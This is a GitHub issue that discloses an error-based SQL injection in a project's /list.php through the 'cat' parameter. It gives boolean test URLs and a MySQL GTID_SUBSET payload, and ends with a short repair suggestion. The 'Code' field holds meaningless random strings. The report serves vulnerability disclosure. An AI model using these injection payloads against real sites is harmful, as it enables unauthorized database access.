Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a vulnerability in your project - SQL injection #3

Open
zhutoujun opened this issue Jun 28, 2021 · 0 comments
Open

There is a vulnerability in your project - SQL injection #3

zhutoujun opened this issue Jun 28, 2021 · 0 comments

Comments

@zhutoujun
Copy link

Code Adress:/list.php
Type:SQL injection error-based
Parameter:cat
Code:
6ENHHBUPFTUAX 5XIFUW0UY

exploit:
http://debug1.com//list.php?cat=1 and 1=1
http://debug1.com//list.php?cat=1 and 1=2
OSSV4KAU1W5384MEDDJWP

https://127.0.0.1/list.php?cat=1 AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(2051=2051,1))),0x716b7a7171),2051)

Repair suggestion: intercept the SQL injection request that adds the get post parameter to the program, or escape or preprocess the program SQL

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant